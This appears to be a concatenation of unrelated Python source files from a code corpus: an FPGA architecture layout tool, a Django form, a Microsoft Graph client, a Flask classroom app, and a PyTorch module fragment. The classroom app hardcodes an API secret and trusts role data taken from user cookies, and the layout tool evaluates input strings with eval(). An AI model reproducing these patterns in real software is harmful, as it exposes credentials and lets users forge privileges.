- 'side' : Fabric side suffix. Takes one of the following: "_left", "_top"
"_right" or "_bottom". Empty string for non-side tiles and for
grid corners.
- 'site[N]' : Name of the N-th equivalent site of a sub-tile
For conveniance the pattern string may also use simple math. expressions to eg.
transform the grid coordinates. For an expression to be evaluated one has to
be given in round brackets.
An example of a pattern that uses tags:
"TILE_{tile_name}_X{x}Y{y}"
An example of a pattern that transforms the X coordinate:
"{tile_name}_X({x}+10)Y{y}"
"""
import argparse
import re
import itertools
import sys
import lxml.etree as ET
# =============================================================================
# Empty tile name
EMPTY = "EMPTY"
# =============================================================================
class GridLocSpec:
"""
Grid location specification construct that corresponds to VPR grid location tags:
https://docs.verilogtorouting.org/en/latest/arch/reference/#grid-location-tags
"""
PARAMS = (
("x", None),
("y", None),
("startx", "0"),
("starty", "0"),
("endx", "W-1"),
("endy", "H-1"),
("incrx", "w"),
("incry", "h"),
)
def __init__(self, xml_elem, tile_types):
# Get the grid dimensions
xml_parent = xml_elem.getparent()
grid_w = int(xml_parent.attrib["width"])
grid_h = int(xml_parent.attrib["height"])
# Common fields
self.type = xml_elem.tag
self.tile = xml_elem.attrib["type"]
self.priority = int(xml_elem.attrib["priority"])
self.xml_metadata = None
# Get the tile size
self.tile_w, self.tile_h = tile_types[self.tile][0:2]
# Optional fields but common to many constructs
globs = {"W": grid_w, "H": grid_h, "w": self.tile_w, "h": self.tile_h}
params = {}
for param, default in self.PARAMS:
s = xml_elem.attrib.get(param, default)
if s is not None:
params[param] = int(eval(s, {'__builtins__':None}, globs))
# "fill"
if xml_elem.tag == "fill":
self.locs = set(
[loc for loc in itertools.product(
range(0, grid_w, self.tile_w),
range(0, grid_h, self.tile_h)
)]
)
# "corners"
elif xml_elem.tag == "corners":
self.locs = set([
(0, 0,),
(grid_w - self.tile_w, 0),
(0, grid_h - self.tile_h),
(grid_w - self.tile_w, grid_h - self.tile_h)
])
# "perimeter"
elif xml_elem.tag == "perimeter":
self.locs = set()
for x in range(0, grid_w, self.tile_w):
self.locs.add((x, 0,))
self.locs.add((x, grid_h - self.tile_h,))
for y in range(self.tile_h, grid_h - self.tile_h, self.tile_h):
self.locs.add((0, y))
self.locs.add((grid_w - self.tile_w, y))
# "region"
elif xml_elem.tag == "region":
# TODO: Support repeatx and repeaty
assert "repeatx" not in xml_elem.attrib, "'repeatx' not supported"
assert "repeaty" not in xml_elem.attrib, "'repeaty' not supported"
self.locs = set(
[(x, y,) for x, y in itertools.product(
range(params["startx"], params["endx"] + 1, params["incrx"]),
range(params["starty"], params["endy"] + 1, params["incry"])
)]
)
# "row"
elif xml_elem.tag == "row":
# TODO: Support incry
assert "incry" not in xml_elem.attrib, "'incry' not supported"
self.locs = set([
(x, params["starty"],) for x in range(params["startx"], grid_w)
])
# "col"
elif xml_elem.tag == "col":
# TODO: Support incrx
assert "incrx" not in xml_elem.attrib, "'incrx' not supported"
self.locs = set([
(params["startx"], y) for y in range(params["starty"], grid_h)
])
# "single"
elif xml_elem.tag == "single":
self.locs = set(((params["x"], params["y"],),))
# For "single" store its original metadata
self.xml_metadata = xml_elem.find("metadata")
else:
assert False, "Unknown grid location spec '{}'".format(xml_elem.tag)
# =============================================================================
def dump_tile_grid(grid, file=sys.stdout):
"""
A debugging function. Dumps the tile (block) grid as ASCII text.
"""
print("Tile grid:", file=file)
xmax = max([loc[0] for loc in grid])
ymax = max([loc[1] for loc in grid])
for y in range(ymax + 1):
l = " {:>2}: ".format(y)
for x in range(xmax + 1):
loc = (x, y,)
if loc not in grid:
l += '.'
else:
tile_type = grid[loc]
if tile_type == EMPTY:
l += '.'
else:
l += tile_type[0].upper()
print(l, file=file)
def assemble_grid(gridspec_list):
"""
Assembles the tilegrid from multipe GridLocSpec objects
"""
# Sort by priority
gridspec_list = sorted(gridspec_list, key=lambda item: item.priority)
# Assemble the grid
grid = {}
for gridspec in gridspec_list:
for loc in gridspec.locs:
# Clear the tile area in case it has width and/or height > 1
if gridspec.tile_w > 1 or gridspec.tile_h > 1:
for x, y in itertools.product(
range(gridspec.tile_w),
range(gridspec.tile_h)):
l = (loc[0] + x, loc[1] + y)
grid[l] = EMPTY
# Base tile location
grid[loc] = gridspec.tile
# Dump the grid
dump_tile_grid(grid, sys.stderr)
return grid
def process_fixed_layout(xml_layout, tile_types, sub_tile_prefix, args):
"""
Processes a fixed layout. Converts it to a layout consisting only of
"single" tiles.
"""
print("Processing fixed layout '{}' ...".format(xml_layout.attrib["name"]),
file=sys.stderr)
# Decode grid location specifications
grid_spec = []
for xml_elem in xml_layout:
if xml_elem.tag is not ET.Comment:
grid_spec.append(GridLocSpec(xml_elem, tile_types))
# Assemble the tile grid
grid = assemble_grid(grid_spec)
# Determine the grid extent
xs = set(loc[0] for loc in grid)
ys = set(loc[1] for loc in grid)
xmin = min(xs)
xmax = max(xs)
ymin = min(ys)
ymax = max(ys)
# "prefix only", "no prefix" lists
if args.prefix_only is not None:
prefix_only = set(args.prefix_only.split(","))
else:
prefix_only = set(tile_types.keys())
if args.no_prefix is not None:
no_prefix = set(args.no_prefix.split(","))
else:
no_prefix = set()
# Math equation evaluation function
def math_eval(match):
return str(eval(match.group(1), {'__builtins__':None}, {}))
# Write layout
xml_layout_new = ET.Element("fixed_layout", attrib=xml_layout.attrib)
keys = sorted(list(grid.keys()))
for loc in keys:
tile_type = grid[loc]
# Skip EMPTY tiles, in VPR tiles are empty by default
if tile_type == EMPTY:
continue
# Determine FPGA grid side
side = ""
if loc[0] == xmin and loc[1] > ymin and loc[1] < ymax:
side = "_left"
if loc[0] == xmax and loc[1] > ymin and loc[1] < ymax:
side = "_right"
if loc[1] == ymin and loc[0] > xmin and loc[0] < xmax:
side = "_bottom"
if loc[1] == ymax and loc[0] > xmin and loc[0] < xmax:
side = "_top"
# Create a new "single" tag
xml_single = ET.Element("single", attrib = {
"type": tile_type,
"x": str(loc[0]),
"y": str(loc[1]),
"priority": "10" # FIXME: Arbitrary
})
# Append metadata
if args.fasm_prefix is not None:
if tile_type in prefix_only and tile_type not in no_prefix:
sub_tiles = tile_types[tile_type][2]
fasm_prefixes = []
# Make prefix for each sub-tile
z = 0
for sub_tile_type, capacity, equivalent_sites in sub_tiles:
for i in range(capacity):
# Basic tags
tags = {
"tile": tile_type,
"sub_tile": sub_tile_type,
"x": str(loc[0]),
"y": str(loc[1]),
"z": str(z),
"i": str(i),
"side": side,
"site": equivalent_sites,
}
# Render the FASM prefix template
fasm_prefix = args.fasm_prefix.format(**tags)
# Check if we need to add another prefix for the
# sub-tile
if sub_tile_type in sub_tile_prefix:
fasm_prefix += "."
fasm_prefix += sub_tile_prefix[sub_tile_type].format(**tags)
# Evaluate equations
fasm_prefix = re.sub(r"\[([0-9+\-*/%]+)\]",
math_eval, fasm_prefix)
fasm_prefixes.append(fasm_prefix)
z = z + 1
# Create and append the XML tag
xml_metadata = ET.Element("metadata")
xml_meta = ET.Element("meta", attrib={"name": "fasm_prefix"})
xml_meta.text = " ".join(fasm_prefixes)
xml_metadata.append(xml_meta)
xml_single.append(xml_metadata)
xml_layout_new.append(xml_single)
return xml_layout_new
def process_layouts(xml_layout, tile_types, args):
"""
Processes grid layouts
"""
# Parse format strings for sub-tile prefixes
sub_tile_prefix = {}
for spec in args.sub_tile_prefix:
parts = spec.strip().split("=")
assert len(parts) == 2, spec
sub_tile_prefix[parts[0]] = parts[1]
# Look for "fixed_layout" and process them
for xml_elem in list(xml_layout):
if xml_elem.tag == "fixed_layout":
xml_layout_new = process_fixed_layout(
xml_elem, tile_types, sub_tile_prefix, args)
xml_layout.remove(xml_elem)
xml_layout.append(xml_layout_new)
# =============================================================================
def parse_tiles(xml_tiles):
"""
Read tile sizes (width and height) and sub-tile counts
"""
tile_types = {}
# A helper function for getting all equivalent sites
def get_equivalent_sites(xml_parent):
# the "equivalent_sites" tag
xml_equiv = xml_parent.find("equivalent_sites")
assert xml_equiv is not None
# List sites
return [item.attrib["pb_type"] for item in xml_equiv.findall("site")]
# Process all "tile" tags
for xml_tile in xml_tiles.findall("tile"):
name = xml_tile.attrib["name"]
width = int(xml_tile.attrib.get("width", "1"))
height = int(xml_tile.attrib.get("height", "1"))
# Process sub-tile tags
sub_tiles = []
for xml_sub_tile in xml_tile.findall("sub_tile"):
sub_name = xml_sub_tile.attrib["name"]
sub_count = int(xml_sub_tile.get("capacity", "1"))
sites = get_equivalent_sites(xml_sub_tile)
sub_tiles.append((sub_name, sub_count, sites,))
# No sub-tiles, assume that the tile is not heterogeneous
if not sub_tiles:
count = int(xml_tile.get("capacity", "1"))
sites = get_equivalent_sites(xml_tile)
sub_tiles = [(name, count, sites)]
tile_types[name] = (width, height, tuple(sub_tiles),)
# Add entry for the EMPTY tile
tile_types[EMPTY] = (1, 1, (EMPTY, 1,),)
return tile_types
# =============================================================================
def main():
# Parse arguments
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument(
"--arch-in",
type=str,
required=True,
help="VPR arch.xml input"
)
parser.add_argument(
"--arch-out",
type=str,
default=None,
help="VPR arch.xml output"
)
parser.add_argument(
"--fasm_prefix",
type=str,
default=None,
help="A template string for FASM prefix (def. None)"
)
parser.add_argument(
"--sub-tile-prefix",
type=str,
default=[],
nargs="+",
help="Template strings for sub-tile FASM prefixes (<sub_tile>=<prefix_fmt>) (def. None) "
)
parser.add_argument(
"--prefix-only",
type=str,
default=None,
help="A comma separated list of tile types to be prefixed"
)
parser.add_argument(
"--no-prefix",
type=str,
default=None,
help="A comma separated list of tile types NOT to be prefixed"
)
args = parser.parse_args()
# Read and parse the XML techfile
xml_tree = ET.parse(args.arch_in, ET.XMLParser(remove_blank_text=True))
xml_arch = xml_tree.getroot()
assert xml_arch is not None and xml_arch.tag == "architecture"
# Get tiles
xml_tiles = xml_arch.find("tiles")
assert xml_tiles is not None
# Get tile sizes
tile_types = parse_tiles(xml_tiles)
# Get layout
xml_layout = xml_arch.find("layout")
assert xml_layout is not None
# Process the layout
process_layouts(xml_layout, tile_types, args)
# Write the modified architecture file back
xml_tree = ET.ElementTree(xml_arch)
xml_tree.write(
args.arch_out,
pretty_print=True,
encoding="utf-8"
)
# =============================================================================
if __name__ == "__main__":
main()
| 2.71875
| 3
|
db/fdependency.py
|
ContentsViewer/Python-stdlib
| 0
|
12780058
|
<gh_stars>0
class FDependency:
"""
Function dependecy class
Example:
fd1 = FDependency(['A','B'],['C'])
fd2 = FDependency(['B'],['D'])
fd3 = FDependency(['A','B','E'],['C','D'])
fd4 = FDependency(['C','D'],['E'])
fd5 = FDependency(['C','E'],['A'])
"""
def __init__(self, lh, rh):
self.lh = lh
self.rh = rh
def __str__(self):
return str(self.lh) + ' -> ' + str(self.rh)
def __eq__(self, other):
return set(self.lh) == set(other.lh) and set(self.rh) == set(other.rh)
| 3.28125
| 3
|
UserAuthentication/starter_code_4_views/src/core/forms.py
|
johangenis/intermediate-django-concepts
| 0
|
12780059
|
<filename>UserAuthentication/starter_code_4_views/src/core/forms.py
from django import forms
# from django.conf import settings
from django.contrib.auth import get_user_model
# settings.AUTH_USER_MODEL
User = get_user_model()
class UserRegisterForm(forms.ModelForm):
class Meta:
model = User
fields = [
"username",
"email",
"password",
]
| 1.765625
| 2
|
src/microsoft_graph/base.py
|
KaiWalter/family-board-py
| 0
|
12780060
|
import logging
import requests
from injector import inject
import app_config
from microsoft_graph import MicrosoftGraphAuthentication
class MicrosoftGraph:
@inject
def __init__(self, authentication_handler: MicrosoftGraphAuthentication):
self.authentication_handler = authentication_handler
def query(self, url, additional_headers=None):
self.__update_token()
result = None
if self.token:
headers = {
'Authorization': f'{self.token["token_type"]} {self.token["access_token"]}'
}
if additional_headers:
headers.update(additional_headers)
result = requests.get(url, headers=headers)
return result
def __update_token(self):
self.token = None
self.token = self.authentication_handler.get_token_from_cache()
if not self.token:
logging.error('token not updated')
| 2.484375
| 2
|
main.py
|
sammysamau/remoteclassroom
| 3
|
12780061
|
<gh_stars>1-10
import os
import cgi
import uuid
from google.appengine.ext import ndb
from flask import Flask, render_template, redirect, session, request, make_response, url_for
from datetime import datetime, timedelta
import json
import logging
from common import app, p, getStudents, getMeetings, getStudent, pusher_key_config
from model import Log, Student, Course
from hashids import Hashids
from counter import increment, get_count
from common import feedUpdated, configChanged, generate_color, generate_user_id
import admin
import lti
import pusherauth
import snap
import urllib
from opentok import OpenTok, MediaModes
from pylti.common import LTI_SESSION_KEY
import settings
from canvas_read import CanvasReader
DEFAULT_COURSE_PREFIX = 'remoteclassschool'
OPENTOK_API_KEY = '46055162'
OPENTOK_API_SECRET = '29da2d1de1fdb09d35bf8a8b30167604e97f67f5'
'''
@app.route("/class")
def show_class():
link = Link.get_by_id('class_link')
if link == None:
return redirect("/")
return redirect(link.link)
@app.route("/classroom")
def show_classroom():
link = Link.get_by_id('class_link')
if link == None:
return redirect("/")
return redirect(link.link + "?sl=")
@app.route("/slide")
def show_slide():
link = Link.get_by_id('slide_link')
return redirect(link.link)
@app.route("/quiz")
def show_quiz():
quizLink = app.config.get('features')['quiz']['redirectLink']
return redirect(quizLink)
@app.route("/changeclassroom")
def show_admin_change_classlink():
link = Link.get_by_id('class_link')
jsonconfig = json.dumps(app.config.get('config'))
return render_template('admin/classroom_link.html', jsconfig=jsonconfig, classlink=link)
@app.route("/changeslide")
def show_admin_change_slidelink():
link = Link.get_by_id('slide_link')
jsonconfig = json.dumps(app.config.get('config'))
return render_template('admin/slide_link.html', jsconfig=jsonconfig, slidelink=link)
def go_to_student(studentId):
student = getStudent(studentId)
if student is not None:
return redirect(student['skypeMeeting'])
return redirect("/")
@app.route("/changeclassroom", methods=['POST'])
def trigger_changeclassroom():
classlink = cgi.escape(request.form['classlink'])
link = Link.get_or_insert('class_link', link=classlink)
link.link = classlink
link.put()
return redirect("/changeclassroom")
@app.route("/changeslide", methods=['POST'])
def trigger_changeslide():
slidelink = cgi.escape(request.form['slidelink'])
link = Link.get_or_insert('slide_link', link=slidelink)
link.link = slidelink
link.put()
return redirect("/changeslide")
'''
@app.route("/")
def show_index():
return render_template('www/index.html')
@app.route("/test")
def show_test():
return render_template('test.html')
@app.route("/main")
def main():
return render_template('main.html')
@app.route('/create', methods=['GET', 'POST'])
def create():
if request.method == 'POST':
content = request.get_json(silent=True)
fullName = cgi.escape(content['username'])
className = cgi.escape(content['classname'])
hashids = Hashids(salt=settings.HASHID_SALT,min_length=6)
increment()
count = get_count()
hashid = hashids.encode(count)
courseId = DEFAULT_COURSE_PREFIX + hashid
userId = request.cookies.get('remote_userid') if 'remote_userid' in request.cookies else generate_user_id()
userColor = request.cookies.get('remote_usercolor') if 'remote_usercolor' in request.cookies else generate_color()
host = app.config.get('host')
resp = make_response(hashid)
# Add course to database
key = courseId
course = Course.get_or_insert(key, courseId=courseId, teacherName=fullName)
course.put()
# Add teacher to course
# Create OpenTok session
opentok_sdk = OpenTok(OPENTOK_API_KEY, OPENTOK_API_SECRET)
# use tokbox server to route media streams;
# if you want to use p2p - change media_mode to MediaModes.relayed
opentok_session = opentok_sdk.create_session(media_mode = MediaModes.routed)
opentok_token = opentok_sdk.generate_token(opentok_session.session_id)
key = courseId + userId
user = Student.get_or_insert(key,
courseId = courseId,
studentId = userId,
fullName = fullName,
color = userColor,
role = 'TEACHER',
opentokSessionId = opentok_session.session_id,
opentokToken = opentok_token
)
user.put()
# Set user cookies (teacher role)
auth = json.loads(request.cookies.get('remote_auth')) if 'remote_auth' in request.cookies else {}
auth[hashid] = {
'role': 'Instructor',
'opentok_api_key': OPENTOK_API_KEY,
'opentok_session_id': user.opentokSessionId,
'opentok_token': user.opentokToken
}
resp.set_cookie('remote_userfullname', fullName)
resp.set_cookie('remote_auth', json.dumps(auth))
resp.set_cookie('remote_userid', userId)
resp.set_cookie('remote_usercolor', userColor)
#resp.set_cookie('remote_userinitials', userInitials)
return resp
return redirect('/main#/create')
@app.route('/join', methods=['POST'])
def join():
content = request.get_json(silent=True)
hashid = cgi.escape(content['hashid'])
fullName = cgi.escape(content['username'])
userId = request.cookies.get('remote_userid') if 'remote_userid' in request.cookies else generate_user_id()
userColor = request.cookies.get('remote_usercolor') if 'remote_usercolor' in request.cookies else generate_color()
resp = make_response(hashid)
# Ensure course exists
courseId = DEFAULT_COURSE_PREFIX + hashid
course = ndb.Key('Course', courseId).get()
# Add user to course
key = courseId + userId
user = Student.get_or_insert(key, courseId=courseId, studentId=userId, fullName=fullName, color=userColor)
userInitials = user.initials
user.put()
if not user.opentokSessionId:
opentok_sdk = OpenTok(OPENTOK_API_KEY, OPENTOK_API_SECRET)
# use tokbox server to route media streams;
# if you want to use p2p - change media_mode to MediaModes.relayed
opentok_session = opentok_sdk.create_session(media_mode = MediaModes.routed)
opentok_token = opentok_sdk.generate_token(opentok_session.session_id)
user.opentokSessionId = opentok_session.session_id
user.opentokToken = opentok_token
user.put()
teacher = Student.get_teacher_by_course(courseId)
# Set user cookies (student role)
auth = json.loads(request.cookies.get('remote_auth')) if 'remote_auth' in request.cookies else {}
auth[hashid] = {
'role': 'Student',
'opentok_api_key': OPENTOK_API_KEY,
'opentok_session_id': user.opentokSessionId,
'opentok_token': user.opentokToken,
'teacher_session_id': teacher.opentokSessionId,
'teacher_token': teacher.opentokToken
}
resp.set_cookie('remote_userfullname', fullName)
resp.set_cookie('remote_auth', json.dumps(auth))
resp.set_cookie('remote_userid', userId)
resp.set_cookie('remote_usercolor', userColor)
resp.set_cookie('remote_userinitials', userInitials)
configChanged(courseId, 'config', 'users')
return resp
@app.route("/<launch_id>")
def launch_by_id(launch_id):
#session['course_id'] = launch_id
#classSkype = ndb.Key('Setting', session['course_id'] + 'classSkype').get()
#iframeUrl = ndb.Key('Setting', session['course_id'] + 'iframeUrl').get()
jsonconfig = {
'PUSHER_APP_KEY': json.dumps(pusher_key_config['PUSHER_APP_KEY']).replace('"', ''),
#'iframeUrl': json.dumps(iframeUrl.value).replace('"', '') if iframeUrl else '',
#'classSkype': json.dumps(classSkype.value).replace('"', '') if classSkype else ''
}
# Lookup course id
courseId = DEFAULT_COURSE_PREFIX + launch_id
course = ndb.Key('Course', courseId).get()
courseName = course.courseName
teacherName = course.teacherName
if not course:
return "Error: No such course code"
if 'remote_auth' not in request.cookies:
return redirect('/main?launch=' + launch_id + '&name=' + urllib.quote(courseName) + '&teacher=' + urllib.quote(teacherName) + ' #join')
auth = json.loads(request.cookies.get('remote_auth'))
userId = request.cookies.get('remote_userid')
userColor = request.cookies.get('remote_usercolor')
fullName = request.cookies.get('remote_userfullname')
userInitials = request.cookies.get('remote_userinitials')
role = auth[launch_id]['role'] if launch_id in auth else ''
host = os.environ['HTTP_HOST']
protocol = 'https' # if request.url.startswith('http://') else 'https'
opentok_session_id = auth[launch_id]['opentok_session_id'] if launch_id in auth else ''
opentok_token = auth[launch_id]['opentok_token'] if launch_id in auth else ''
if not role:
return redirect('/main?launch=' + launch_id + '&name=' + urllib.quote(courseName) + '&teacher=' + urllib.quote(teacherName) + ' #join')
session['opentok_session_id'] = opentok_session_id
# Setup fake LTI session
session['full_name'] = fullName
session['guid'] = str(uuid.uuid4()) # Generate new UUID
session['course_id'] = courseId
session['user_id'] = userId
session['user_color'] = userColor
session['user_initials'] = userInitials
session['host'] = host
#session['user_image'] = request.form.get('user_image')
session[LTI_SESSION_KEY] = True
session['oauth_consumer_key'] = settings.CONSUMER_KEY
jsonsession = {
#'guid': session['guid'],
'course_id': DEFAULT_COURSE_PREFIX + launch_id,
'course_name': course.courseName,
'course_apps': course.courseApps,
'user_id': userId, #session['user_id'],
'full_name': fullName,
'user_color': userColor,
'user_initials': userInitials,
'host': host,
#'user_image': session['user_image'],
'role': role,
'opentok_api_key': OPENTOK_API_KEY,
'opentok_session_id': opentok_session_id,
'opentok_token': opentok_token,
'launch_id': launch_id,
'protocol': protocol
}
if 'Instructor' in role:
session['roles'] = 'Instructor'
return render_template('admin.html', jsconfig=json.dumps(jsonconfig), jssession=json.dumps(jsonsession))
else:
session['roles'] = 'Student'
jsonsession['opentok_teacher_session_id'] = auth[launch_id]['teacher_session_id']
jsonsession['opentok_teacher_token'] = auth[launch_id]['teacher_token']
return render_template('student.html', jsconfig=json.dumps(jsonconfig), jssession=json.dumps(jsonsession))
@app.route("/test-starter")
def show_starter():
host = app.config.get('host')
logging.info(request.view_args.items())
jsonconfig = {
'PUSHER_APP_KEY': json.dumps(pusher_key_config['PUSHER_APP_KEY']).replace('"', ''),
'iframeUrl': 'http://snap.berkeley.edu/snapsource/snap.html'
}
iframeUrl = ndb.Key('Setting', '1207667iframeUrl').get()
if (iframeUrl):
jsonconfig['iframeUrl'] = json.dumps(iframeUrl.value).replace('"', '')
jsonsession = {
'full_name': 'test',
'course_id': '1207667',
'user_id': 'asdasdas', #'8791939',
'role': 'Instructor'
}
student = ndb.Key('Student', jsonsession['course_id'] + jsonsession['user_id']).get()
return render_template('student.html', jsconfig=jsonconfig, jssession=jsonsession, host=host)
@app.route("/test-admin")
def show_adminn():
host = app.config.get('host')
jsonconfig = {
'PUSHER_APP_KEY': json.dumps(pusher_key_config['PUSHER_APP_KEY']).replace('"', ''),
'iframeUrl': 'http://snap.berkeley.edu/snapsource/snap.html',
'classSkype': 'https://meet.lync.com/microsoft/samelh/37BHT9O9'
}
jsonsession = {
'full_name': 'test'
}
return render_template('admin.html', jsconfig=jsonconfig, jssession=jsonsession, host=host)
'''
@app.route("/starter", methods=['POST'])
def get_starter_info():
studentId = cgi.escape(request.form['studentId'])
rewards = Log.get_by_type(studentId, 'reward')
weeklyrewards = Log.get_by_type_weekly(studentId, 'reward')
info = {}
info["totaltickets"] = rewards.count()
info["weeklytickets"] = weeklyrewards.count()
return json.dumps(info)
'''
if __name__ == "__main__":
app.run(debug=app.config.get('debug'))
| 2.125
| 2
|
generic_links/templatetags/generic_links_tags.py
|
johnbaldwin/django-generic-links
| 8
|
12780062
|
<reponame>johnbaldwin/django-generic-links
# -*- coding: utf-8 -*-
"""
Several usefull template tags!
"""
from django import template
from generic_links import utils
register = template.Library()
class RelatedLinksNode(template.Node):
def __init__(self, context_var, obj, is_external):
self.context_var = context_var
self.obj_var = template.Variable(obj)
self.is_external = is_external
def render(self, context):
obj = self.obj_var.resolve(context)
context[self.context_var] = utils.get_links_for(obj).select_related("user").filter(is_external=self.is_external)
return u""
@register.tag
def get_links_for(parser, token):
"""
Usage: {% get_links_for <obj> as <some_var> %}
"""
bits = token.split_contents()
if len(bits) != 4:
message = "'%s' tag requires three arguments" % bits[0]
raise template.TemplateSyntaxError(message)
return RelatedLinksNode(bits[3], bits[1], True)
| 2.265625
| 2
|
python/searching/interpolation.py
|
nikitanamdev/AlgoBook
| 191
|
12780063
|
<gh_stars>100-1000
#Interpolation search is an improved version of binary search.
#Its time complexity is O(log(log n)) as compared to log(n) of binary search.
#following is the code of interpolation search:
# Python program to implement interpolation search
#Variable naming:
"""
1) lys - our input array
2) val - the element we are searching for
2) index - the probable index of the search element. This is computed to be a higher value when val
is closer in value to the element at the end of the array (lys[high]), and lower when val
is closer in value to the element at the start of the array (lys[low])
4) low - the starting index of the array
5) high - the last index of the array"""
def InterpolationSearch(lys, val):
low = 0
high = (len(lys) - 1)
while low <= high and val >= lys[low] and val <= lys[high]:
index = low + int(((float(high - low) / ( lys[high] - lys[low])) * ( val - lys[low])))
if lys[index] == val:
return index
if lys[index] < val:
low = index + 1
else:
high = index - 1
return -1
print(InterpolationSearch([1,2,3,4,5,6,7,8], 6))
| 3.75
| 4
|
jft.py
|
isimluk/jft
| 0
|
12780064
|
<filename>jft.py
#!/bin/python3
from jft import connect
conn = connect()
print(conn)
| 1.601563
| 2
|
bluebottle/follow/admin.py
|
terrameijar/bluebottle
| 10
|
12780065
|
<gh_stars>1-10
from django.contrib.contenttypes.admin import GenericTabularInline
from bluebottle.follow.models import Follow
class FollowAdminInline(GenericTabularInline):
model = Follow
ct_fk_field = "instance_id"
readonly_fields = ['created', 'user']
fields = readonly_fields
extra = 0
can_delete = True
| 1.679688
| 2
|
src/connectivity/overnet/lib/stats/link.py
|
bootingman/fuchsia2
| 1
|
12780066
|
<gh_stars>1-10
#!/usr/bin/env python
# Copyright 2019 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import statsc
statsc.compile(
name='Link',
include='src/connectivity/overnet/lib/stats/link.h',
stats = [
statsc.Counter(name='incoming_packet_count'),
statsc.Counter(name='outgoing_packet_count'),
]
)
| 1.390625
| 1
|
semantic_aware_models/models/recommendation/random_recommender.py
|
ITAINNOVA/SAME
| 0
|
12780067
|
from semantic_aware_models.models.recommendation.abstract_recommender import AbstractRecommender
from semantic_aware_models.dataset.movielens.movielens_data_model import *
from surprise import NormalPredictor
from surprise.reader import Reader
from surprise.dataset import Dataset
import time
class RandomRecommender(AbstractRecommender):
""" Algorithm predicting a random rating based on the distribution of the training set, which is assumed to be normal. """
def __init__(self, ratings_file_path=None, separator=None):
super(AbstractRecommender, self).__init__()
# Create the recommendation input_model and configure its input parameters:
self.model = NormalPredictor()
self.rating_data_model = RatingDataModel(ratings_file_path=ratings_file_path, separator=separator)
self.separator = separator
def recommend(self, user_id, how_many):
"""
Recommends the best items for a specific user.
:param user_id: Id of the user to recommend.
:param how_many: Number of items that we recommend to the specific user.
:return: Id of the items that the recommender returns.
"""
# Items not seen by a specific user.
item_ids_not_seen_from_user = self.rating_data_model.get_item_ids_not_seen_from_user(user_id)
list_recommend = []
for item_id in item_ids_not_seen_from_user:
preference = self.estimate_preference(user_id, item_id)
list_recommend.append([item_id, preference])
print(item_id, ', ', preference)
list_recommend.sort(key=lambda x: x[1], reverse=True)
return list_recommend[:how_many]
def estimate_preference(self, user_id, item_id):
"""
Estimate the preference value by a specific user.
:param user_id: Id of the user to recommend.
:param item_id: Id of the item to recommend.
:return: The estimate preference by the sepecific recommender.
"""
# train file:
df_ratings = self.rating_data_model.df_ratings
# A reader is still needed but only the rating_scale param is requiered.
reader = Reader(rating_scale=(self.rating_data_model.get_min_preference(), self.rating_data_model.get_max_preference()))
train_data = Dataset(reader=reader)
# The columns must correspond to user id, item id and ratings (in that order).
raw_trainset = train_data.load_from_df(df_ratings[['user_id', 'item_id', 'rating']], reader)
trainset = train_data.construct_trainset(raw_trainset.raw_ratings)
# Train recommendation input_model:
self.model.fit(trainset)
return float(self.model.estimate(u=user_id, i=item_id)[0])
def recommend_rival(self, n_folds, train_test_file_path, reader, recommendation_file_path):
"""
Prepare the predictions to take them to RiVaL Toolkit.
:param n_folds: Number of folds.
:param train_test_file_path: Path with train and input_test files.
:param recommendation_file_path: Path where the suitable files to run RiVaL Toolkit are saved.
:return: The suitable files to run RiVaL Toolkit are saved.
"""
for i in range(n_folds):
print('Fold: ', i)
timestart = time.time()
# train file:
train_file_name = train_test_file_path + 'train_bin_verified_sep_' + str(i) + '.csv'
train_data = Dataset(reader=reader)
raw_trainset = train_data.read_ratings(file_name=train_file_name)
trainset = train_data.construct_trainset(raw_trainset)
timeend = time.time()
print('Train file loading time: ', (timeend - timestart), 'seconds')
timestart = time.time()
# Train recommendation input_model:
self.model.fit(trainset)
timeend = time.time()
print('Training time: ', (timeend - timestart), 'seconds')
# input_test file:
timestart = time.time()
test_file_name = train_test_file_path + 'test_bin_verified_sep_' + str(i) + '.csv'
test_data = Dataset(reader=reader)
raw_testset = test_data.read_ratings(file_name=test_file_name)
testset = test_data.construct_testset(raw_testset)
timeend = time.time()
print('Load time of the input_test file: ', (timeend - timestart), 'seconds')
# Predictions:
timestart = time.time()
predictions = self.model.test(testset)
file_name = open(recommendation_file_path + 'recs_' + str(i) + '.csv', 'w')
for pred in predictions:
user_id = pred[0]
item_id = pred[1]
rating_real = pred[2]
rating_estimated = pred[3]
file_name.write(user_id + "\t" + item_id + "\t" + str(rating_estimated) + '\n')
timeend = time.time()
print('Prediction time: ', (timeend - timestart), 'seconds')
| 2.859375
| 3
|
pytorch/MP_module_hard_soft.py
|
zwxu064/MPLayers
| 10
|
12780068
|
import torch, sys
import torch.nn as nn
sys.path.append('..')
from MPLayers.lib_stereo import TRWP_hard_soft as TRWP_stereo
from MPLayers.lib_seg import TRWP_hard_soft as TRWP_seg
from utils.label_context import create_label_context
# references:
# http://www.benjack.io/2017/06/12/python-cpp-tests.html
# https://pytorch.org/tutorials/advanced/cpp_extension.html
class TRWPFunction(torch.autograd.Function):
@staticmethod
def forward(ctx, unary, label_context, edge_weights, args):
# to, unary:(batch,cv,h,w,disp),message:(dir,batch,cv,h,w,disp),label_context:(disp,disp) for seg and (disp) for stereo
# edge_weights:(dir,batch,cv,h,w)
batch, cv, h, w, n_disp = unary.size()
rho, n_iter, n_dir, is_training = args.rho, args.mpnet_max_iter, args.mpnet_n_dirs, args.training
TRWP = TRWP_seg if (n_disp == 21) else TRWP_stereo
message = unary.new_zeros(n_dir, batch, cv, h, w, n_disp)
cost_final = unary.new_zeros(batch, cv, h, w, n_disp)
unary_update = unary.new_zeros(batch, cv, h, w, n_disp)
if edge_weights is None:
edge_weights = unary.new_ones(n_dir, batch, cv, h, w)
enable_edge_weights = False
else:
enable_edge_weights = True
if args.enable_saving_label:
label_all = unary.new_zeros(n_iter, batch, cv, h, w, dtype=torch.uint8)
else:
label_all = torch.empty(0, dtype=torch.uint8)
if args.mpnet_enable_soft:
if is_training:
message_edge_label = unary.new_zeros(n_iter, n_dir, batch, cv, h, w, n_disp, n_disp)
cost_index = unary.new_zeros(n_iter, n_dir, batch, cv, h, w, dtype=torch.uint8)
else:
message_edge_label = torch.empty(0, dtype=torch.float32)
cost_index = torch.empty(0, dtype=torch.uint8)
TRWP.forward_soft(rho, int(n_iter), unary, label_context, edge_weights,
message, message_edge_label, cost_index, cost_final,
